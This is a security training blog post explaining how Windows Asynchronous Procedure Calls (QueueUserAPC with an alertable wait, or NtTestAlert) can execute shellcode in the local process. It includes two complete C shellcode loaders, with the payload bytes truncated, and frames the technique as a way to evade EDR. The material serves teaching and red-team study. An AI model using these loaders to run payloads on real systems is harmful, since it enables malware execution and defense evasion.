
Shellcode Execution via Asynchronous Procedure Calls

As part of the preparations for my Endpoint Security Insights training, I have been looking into the topic of Asynchronous Procedure Calls (APC). Although there are already several articles on this topic, this compact blog post is intended to cover the key aspects of APCs in the context of shellcode execution with a special focus on local execution (self-injection). My aim is to explain what APCs are, how they are initiated and how APCs can be used to execute shellcode.


Disclaimer


This article is not new research; there are numerous articles on the use of APC in the context of shellcode execution (see resources). The purpose of this text is purely academic; it is for research purposes only and should in no way be used for unethical or illegal activities. I do not claim to be correct or complete.

Asynchronous Procedure Calls

Asynchronous Procedure Calls, or APCs for short, are a mechanism in Windows (and possibly other operating systems, although I can't say for sure at the moment) that allows a function to be scheduled for asynchronous execution in the context of a particular thread. "Asynchronous" in this context means that an operation or function call can be initiated without the initiating process or thread having to wait for it to complete. In a synchronous execution model, by contrast, a process or thread starts a task and then blocks until that task has completed before continuing with the next one. The result of an asynchronous operation is delivered at a later time via a callback mechanism.

An important property of APCs on Windows is that a user-mode APC in a thread's APC queue is only executed once that thread enters an alertable state. A thread enters this state by calling functions such as SleepEx(), WaitForSingleObjectEx(), WaitForMultipleObjectsEx(), MsgWaitForMultipleObjectsEx() or SignalObjectAndWait() with the alertable option enabled.

It should also be mentioned that there are different types of Asynchronous Procedure Calls on Windows, including user-mode APC and kernel-mode APC. A detailed discussion of all APC types is beyond the scope of this article. Therefore, in this article we will only focus on user-mode APC in the context of QueueUserAPC. For those who would like to learn more about the different types of APC, I recommend this article and the article by Ori Damaris that builds on it. This video also gives a good insight into APC.

Concept of APC

Basically, the question arises as to why APCs are of interest for running shellcode via local execution or remote process injection. The simple reason is that shellcode can be executed using, for example, the QueueUserAPC() function without explicitly starting a new thread via CreateThread() in the local context or CreateRemoteThreadEx() in the remote context. Particularly in the context of remote process injection, executing shellcode in a new thread can lead to detection by the EDR, e.g. through user-mode hooking or kernel callback routines registered via PsSetCreateProcessNotifyRoutine() or PsSetCreateThreadNotifyRoutine().

When using user-mode APCs to execute shellcode, whether in the context of local execution (self-injection) or remote process injection, the process always starts with queuing a new user-mode APC, e.g. using the QueueUserAPC() function. You can think of APCs as customers queuing up at a checkout, where the first-in-first-out (FIFO) principle applies. In the second step, we put the current thread (main thread) into an alertable state, e.g. via WaitForSingleObjectEx(), which triggers the processing of the APCs pending for that thread. The following code in C shows the simplest form of shellcode execution via user-mode APCs. Please note that no emphasis is placed here on evasion in the context of RWX memory, unencrypted shellcode, etc. Of course, readers are encouraged to modify, improve and extend the code as they see fit.

// Resources:
// https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection

#include <windows.h>
#include <stdio.h>

int main() {

    unsigned char shellcode[] = "\xfc\x48\x83...";

    // Allocate memory for the shellcode.
    PVOID addr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // Copy the shellcode into the allocated memory.
    memcpy(addr, shellcode, sizeof(shellcode));

    // Queue a User APC to the current thread.
    QueueUserAPC((PAPCFUNC)addr, GetCurrentThread(), NULL);
    // PAPCFUNC is a pointer to a function that is called when the APC is executed.
    // (PAPCFUNC)addr is a cast of the shellcode memory address to a function pointer type that is compatible with APC calls.
    // GetCurrentThread() retrieves a pseudohandle for the current thread.
    // The last parameter is a NULL pointer, which means no argument is passed to the APC function.


    // This function call makes the current thread enter an alertable wait state indefinitely.
    WaitForSingleObjectEx(GetCurrentThread(), INFINITE, TRUE);
    // An alertable wait state is required for APCs to be executed. 
    // INFINITE means the wait does not time out. The thread will wait here until an APC is executed or another form of wake-up is triggered.
    // The TRUE parameter indicates that the wait is alertable, which allows APCs to be executed.

    return 0;
}

Empty APC Queue

As mentioned above, the first step is to queue a new user-mode APC to the thread's APC queue using QueueUserAPC(). Then, for the APCs to be dispatched, the thread must enter an alertable state, e.g. via WaitForSingleObjectEx(). Only then does the execution of the pending APCs begin. An alternative is the undocumented native function NtTestAlert(), which forces the processing of pending APCs in the APC queue without the need to explicitly put the thread into an alertable wait.

In other words, the primary purpose of NtTestAlert() is to check if the calling thread has any pending Asynchronous Procedure Calls queued for it, and to dispatch and execute them if there are any. If the APC queue was empty before NtTestAlert() was called, then the function simply returns with no effect. This behaviour makes NtTestAlert() useful for ensuring that all pending APCs for a thread are processed, for example before the thread performs an operation that requires a known state for the APC queue, or in our case to initiate shellcode execution via QueueUserAPC().

// Resources:
// https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert

#include <windows.h>
#include <stdio.h>

// Define the prototype of the NtTestAlert function.
typedef NTSTATUS(NTAPI* PFN_NTTESTALERT)(VOID);
// NTAPI is a calling convention that is used for system functions.
// PFN_NTTESTALERT is a pointer to a function that returns NTSTATUS and takes no parameters.

int main() {

    unsigned char shellcode[] = "\xfc\x48\x83...";
    // GetModuleHandleA retrieves a module handle for the specified module.
    HMODULE hNtdll = GetModuleHandleA("ntdll");
    
    // Get a pointer to the NtTestAlert function.
    PFN_NTTESTALERT NtTestAlert = (PFN_NTTESTALERT)GetProcAddress(hNtdll, "NtTestAlert");
    // hNtdll is the handle to the DLL module that contains the function.
    // "NtTestAlert" is the name of the function.

    // Allocate memory for the shellcode.
    PVOID addr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // Copy the shellcode to the allocated memory.
    memcpy(addr, shellcode, sizeof(shellcode));

    // QueueUserAPC queues a user-mode Asynchronous Procedure Call (APC) to the specified thread.
    QueueUserAPC((PAPCFUNC)addr, GetCurrentThread(), NULL);
    // PAPCFUNC is a pointer to a function that is called when the APC is executed.
    // (PAPCFUNC)addr is a cast of the shellcode memory address to a function pointer type that is compatible with APC calls.
    // GetCurrentThread() retrieves a pseudohandle for the current thread.
    // The last parameter is a NULL pointer, which means no argument is passed to the APC function.

    NtTestAlert();

    return 0;
}

Summary

To conclude this very compact blog post, a quick summary. It has been explained that APCs can be used to execute shellcode. This makes it possible for an attacker (red teamer) to avoid the dedicated creation of a new thread via CreateThread() in the local context or CreateRemoteThreadEx() in the remote process context. Instead, the use of APCs allows the shellcode to be executed asynchronously directly in the context of the main thread. Although this article has only dealt with local execution (self-injection), I believe that this technique can be particularly useful for remote process injections in the context of evasion (defined as not prevented and not detected) of Endpoint Detection and Response (EDR) systems.

As already explained, the first step is to queue a new APC using QueueUserAPC(). The APC is then processed either when the thread enters an alertable state, or when processing is forced using the native NtTestAlert() function.

I hope this article has given you a little insight into how APCs work in the context of shellcode execution and thank you for reading. Until the next article.

Happy Hacking!

Daniel Feichter @VirtualAllocEx

Last updated 31.03.24 15:56:42